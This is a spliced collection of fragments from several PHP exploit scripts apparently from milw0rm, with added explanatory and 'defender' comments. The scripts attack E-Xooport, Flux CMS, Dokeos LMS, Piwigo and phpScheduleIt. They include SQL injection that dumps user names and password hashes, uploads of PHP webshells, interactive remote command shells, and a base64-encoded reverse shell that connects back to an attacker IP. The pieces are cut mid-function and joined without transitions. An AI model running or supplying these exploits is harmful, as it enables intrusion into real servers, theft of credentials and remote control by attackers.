    $payload .= "Content-Disposition: form-data; name=\"Submit\"\r\n\r\n\"Send\"\r\n";
    $payload .= "--o0oOo0o\r\n";
    $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"poc.php\"\r\n\r\n";
    $payload .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";
    $payload .= "--o0oOo0o--\r\n";
    $packet = "POST {$path}?L=interact.file&id=0 HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Length: " . strlen($payload) . "\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $payload;
    // Upload response is not checked; success is inferred from the listing.
    http_send($host, $packet);
    $packet = "GET {$path}system/cache/temp/ HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: close\r\n\r\n";
    if (preg_match("/[0-9]*_poc.php/", http_send($host, $packet), $match)) {
        return $match[0];
    }
    die("\n[-] Directory listing denied\n");
}
                $table = $reg[1];
            }
            $ex = str_replace("[N]", $k, $sql);
            $txt = getContent(http_send($host, makePacket($path, $ex, $host)));
        }
    }
    print "\n\n [] Table = {$table}\n\n";
    if (!$uid) {
        $sql = "-1+union+select+concat({$s},uid,0x3a,uname,0x3a,pass,{$s}),0+from+{$table}+limit+[N],1";
    } else {
        $sql = "-1+union+select+concat({$s},uid,0x3a,uname,0x3a,pass,{$s}),0+from+{$table}+where+uid={$uid}+limit+[N],1";
    }
    $regs = array();
    $regex = $string . "(.+)" . $string;
    $n = 0;
    $ex = str_replace("[N]", $n, $sql);
    $pck = makePacket($path, $ex, $host);
    $resp = http_send($host, $pck);
    $txt = getContent($resp);
    while (ereg($regex, $txt, $regs)) {
        $users .= $regs[1] . "\n";
        print $regs[1] . "\n";
        $n++;
        $pck = makePacket($path, str_replace("[N]", $n, $sql), $host);
        $resp = http_send($host, $pck);
        $txt = getContent($resp);
    }
    $write = "\n\nVis Intelligendi" . "\n E-Xooport 3.1 SQL Injection Exploit\n" . "http://vis-intelligendi.co.cc\n" . "Host : {$host}\n" . "Path : {$path}\n" . "http://{$host}{$path}{$sql}\n\n" . "table: {$table}\n\n" . $users . "\n\n Vis Intelligendi Magia";
    fwrite(fopen("exooport_log.txt", "w+"), $write);
    print "Check exooport_log.txt";
}
    die("\n[-] Exploit failed...\n");
}
// STDIN is already a predefined constant in CLI PHP, so this define() is
// redundant (and passes the resource itself, not the name "STDIN").
define(STDIN, fopen("php://stdin", "r"));
// Interactive loop: each command is base64-encoded into a "Cmd" request
// header for loadsave.php, and the text after the first "_code_" marker in
// the response is printed; a response without the marker ends the script.
// Defender note: requests to loadsave.php carrying a custom "Cmd" header
// (and below, an empty "Back" header) are the signatures; $host and $path
// are set earlier in the file, outside this view.
while (1) {
    print "\nfluxcms-shell# ";
    $cmd = trim(fgets(STDIN));
    if ($cmd != "exit") {
        $packet = "GET {$path}webinc/bxe/scripts/loadsave.php HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Cmd: " . base64_encode($cmd) . "\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $output = http_send($host, $packet);
        if (!preg_match("/_code_/", $output)) {
            die("\n[-] Exploit failed...\n");
        }
        $shell = explode("_code_", $output);
        print "\n" . $shell[1];
    } else {
        break;
    }
}
// backup the original script
// An empty "Back:" header is the trigger for the restore; how loadsave.php
// acts on it is not visible here.
$packet = "GET {$path}webinc/bxe/scripts/loadsave.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Back:\r\n";
$packet .= "Connection: close\r\n\r\n";
http_send($host, $packet);
?>

# milw0rm.com [2008-06-09]
print "\n| Dokeos LMS <= 1.8.5 (reverse shell) Code Injection Exploit by EgiX |";
print "\n+--------------------------------------------------------------------+\n\n";
// CLI entry: host, path and the IP the target should connect back to; the
// port is optional and defaults to 4444.
if ($argc < 4) {
    print "\nUsage......: php {$argv['0']} <host> <path> <local IP> [port]\n";
    print "\nExample....: php {$argv['0']} localhost /dokeos/ 192.168.0.2";
    print "\nExample....: php {$argv['0']} localhost / 192.168.0.2 12345\n";
    die;
}
$host = $argv[1];
$path = $argv[2];
$ip = $argv[3];
$port = isset($argv[4]) ? (int) $argv[4] : 4444;
// reverse shell based on http://pentestmonkey.net/tools/php-reverse-shell/
// $code is that script base64-encoded. It is shipped in the "Code" request
// header and run on the target by the eval() injected through
// tablename_column below; the "IP" / "Port" headers tell it where to
// connect back to.
$code = "c2V0X3RpbWVfbGltaXQoMCk7CmluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLCA1KTsKC" . "iRpcCA9ICRfU0VSVkVSW0hUVFBfSVBdOwokcG9ydCA9ICRfU0VSVkVSW0hUVFBfUE9SVF07CiRjaH" . "Vua19zaXplID0gMjA0ODsKCmlmICghKCRzb2NrID0gZnNvY2tvcGVuKCRpcCwgJHBvcnQpKSkgZGl" . "lKCdbZXJyXUNvbm5lY3Rpb24gdG8geyRpcH06eyRwb3J0fSByZWZ1c2VkJyk7CiRkZXNjcmlwdG9y" . "c3BlYyA9IGFycmF5KDAgPT4gYXJyYXkoJ3BpcGUnLCAncicpLCAxID0+IGFycmF5KCdwaXBlJywgJ" . "3cnKSwgMiA9PiBhcnJheSgncGlwZScsICd3JykpOwppZiAoIWlzX3Jlc291cmNlKCgkcHJvY2Vzcy" . "A9IHByb2Nfb3BlbignL2Jpbi9zaCAtaScsICRkZXNjcmlwdG9yc3BlYywgJHBpcGVzKSkpKSBkaWU" . "oJ1tlcnJdQ2FuXCd0IHNwYXduIHNoZWxsJyk7CgpzdHJlYW1fc2V0X2Jsb2NraW5nKCRwaXBlc1sw" . "XSwgMCk7CnN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzFdLCAwKTsKc3RyZWFtX3NldF9ibG9ja" . "2luZygkcGlwZXNbMl0sIDApOwpzdHJlYW1fc2V0X2Jsb2NraW5nKCRzb2NrLCAwKTsKCndoaWxlIC" . "ghZmVvZigkc29jaykgJiYgIWZlb2YoJHBpcGVzWzFdKSkgewoJJHJlYWRfYSA9IGFycmF5KCRzb2N" . "rLCAkcGlwZXNbMV0sICRwaXBlc1syXSk7CgkkbnVtX2NoYW5nZWRfc29ja2V0cyA9IHN0cmVhbV9z" . "ZWxlY3QoJHJlYWRfYSwgJHdyaXRlX2EsICRlcnJvcl9hLCBudWxsKTsKCglpZiAoaW5fYXJyYXkoJ" . "HNvY2ssICRyZWFkX2EpKSB7CgkJJGlucHV0ID0gZnJlYWQoJHNvY2ssICRjaHVua19zaXplKTsKCQ" . "lmd3JpdGUoJHBpcGVzWzBdLCAkaW5wdXQpOwoJfQoJaWYgKGluX2FycmF5KCRwaXBlc1sxXSwgJHJ" . "lYWRfYSkpIHsKCQkkaW5wdXQgPSBmcmVhZCgkcGlwZXNbMV0sICRjaHVua19zaXplKTsKCQlmd3Jp" . "dGUoJHNvY2ssICRpbnB1dCk7Cgl9CglpZiAoaW5fYXJyYXkoJHBpcGVzWzJdLCAkcmVhZF9hKSkge" . "woJCSRpbnB1dCA9IGZyZWFkKCRwaXBlc1syXSwgJGNodW5rX3NpemUpOwoJCWZ3cml0ZSgkc29jay" . "wgJGlucHV0KTsKCX0KfQoKZmNsb3NlKCRzb2NrKTsKZmNsb3NlKCRwaXBlc1swXSk7CmZjbG9zZSg" . "kcGlwZXNbMV0pOwpmY2xvc2UoJHBpcGVzWzJdKTsKcHJvY19jbG9zZSgkcHJvY2Vzcyk7CmRpZTsK";
// "%23" decodes to "#", commenting out whatever follows the injection point.
// Defender notes: request headers named Code/IP/Port with a large base64
// value, and a query parameter containing "eval(base64_decode(", are the
// signatures; egress filtering on the web server blocks the connect-back
// even when the injection succeeds.
$packet = "GET {$path}whoisonline.php?tablename_column=0];}eval(base64_decode(\$_SERVER[HTTP_CODE]));%23 HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Code: {$code}\r\n";
$packet .= "IP: {$ip}\r\n";
$packet .= "Port: {$port}\r\n";
$packet .= "Connection: close\r\n\r\n";
$response = http_send($host, $packet);
// "[err]..." in the response is the shell's own failure message; a normal
// page ending in </html> is attributed to no users being online (die() text).
if (preg_match("/\\[err\\](.*)/", $response, $match)) {
    die("[-] Exploit failed ({$match[1]})\n");
}
if (preg_match("/<\\/html>/", $response)) {
    die("[-] Exploit failed (No users online)\n");
}
?>

# milw0rm.com [2009-04-21]
function check_plugin()
{
    // Installs and activates the "event_tracer" plugin through the admin
    // pages when its event list page reports "not active". Authenticates
    // with the pwg_id session cookie (global $sid); reads globals $host and
    // $path. Nothing is returned and the install/activate responses are not
    // checked.
    // $packet keeps a "%s" placeholder for the request path, filled by
    // sprintf(); a literal "%" in $path or $sid would also be interpreted by
    // sprintf().
    global $host, $path, $sid;
    $packet = "GET {$path}%s HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Cookie: pwg_id={$sid}\r\n";
    $packet .= "Connection: close\r\n\r\n";
    // check if the event_tracer plugin isn't installed
    if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin&section=event_tracer/event_list.php")))) {
        http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install"));
        http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate"));
    }
}
function upload()
{
    // Tries each extension in global $file_ext as a double-extension filename
    // (".php.<ext>") against the FileManager module's javaUpload.php, then
    // fetches the file back from postlet/<$uploaddir> and returns the first
    // extension for which the server executed it (response carries the
    // "_code_" marker but not the literal word "print"). Returns false when
    // no extension worked. Reads globals $host, $path, $uploaddir, $file_ext;
    // prints progress and die()s when the upload response lacks "POSTLET:YES".
    // Defender notes: a multipart POST to javaUpload.php whose filename starts
    // with ".php." is the signature; the planted file reads its command from
    // the HTTP_CMD request header. Rejecting double extensions and never
    // executing "*.php.*" names as PHP are the relevant mitigations.
    global $host, $path, $uploaddir, $file_ext;
    foreach ($file_ext as $ext) {
        print "\n[-] Trying to upload with .{$ext} extension...";
        // Hand-built multipart body with the fixed boundary "12345"; strlen()
        // is a byte count, which is what Content-Length needs.
        $data = "--12345\r\n";
        $data .= "Content-Disposition: form-data; name=\"userfile\"; filename=\".php.{$ext}\"\r\n";
        $data .= "Content-Type: application/octet-stream\r\n\r\n";
        $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
        $data .= "--12345--\r\n";
        $packet = "POST {$path}modules/FileManager/postlet/javaUpload.php HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Content-Length: " . strlen($data) . "\r\n";
        $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $packet .= $data;
        $html = http_send($host, $packet);
        // eregi() is the PHP 5 POSIX regex API (removed in PHP 7).
        if (!eregi("POSTLET:YES", $html)) {
            die("\n[-] Upload failed!\n");
        }
        $packet = "GET {$path}modules/FileManager/postlet/{$uploaddir}.php.{$ext} HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $html = http_send($host, $packet);
        // "print" absent and "_code_" present means the file was executed
        // rather than served back as text.
        if (!eregi("print", $html) and eregi("_code_", $html)) {
            return $ext;
        }
        sleep(1);
    }
    return false;
}
    print "\nUsage......: php {$argv['0']} host path\n";
    print "\nExample....: php {$argv['0']} localhost /";
    print "\nExample....: php {$argv['0']} localhost /phpscheduleit/\n";
    die;
}
$host = $argv[1];
$path = $argv[2];
// The start_date value closes the string it is written into ("1')") and
// appends a passthru() of the base64-decoded HTTP_CMD request header. "%%23"
// is sprintf()-escaped so it becomes "%23" ("#", a PHP line comment) after
// sprintf(); that is why Content-Length below is strlen($payload) - 1 — the
// body shrinks by one byte when "%%" collapses to "%".
$payload = "btnSubmit=1&start_date=1').\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die};%%23";
$packet = "POST {$path}reserve.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$path}reserve.php\r\n";
// "Cmd: %s" is the sprintf() placeholder filled per command below; a literal
// "%" in $path would also be interpreted by sprintf().
$packet .= "Cmd: %s\r\n";
$packet .= "Content-Length: " . (strlen($payload) - 1) . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
// Interactive loop: "exit" leaves; otherwise the text after the first
// "_code_" marker in the response is printed, and a missing marker ends the
// script.
// Defender notes: a POST to reserve.php whose start_date contains "passthru("
// plus a custom "Cmd" header is the signature; the bug class is evaluating
// request data as PHP.
while (1) {
    print "\nphpscheduleit-shell# ";
    $cmd = trim(fgets(STDIN));
    if ($cmd != "exit") {
        $html = http_send($host, sprintf($packet, base64_encode($cmd)));
        $shell = explode("_code_", $html);
        preg_match("/_code_/", $html) ? print "\n{$shell[1]}" : die("\n[-] Exploit failed...\n");
    } else {
        break;
    }
}
?>

# milw0rm.com [2008-10-01]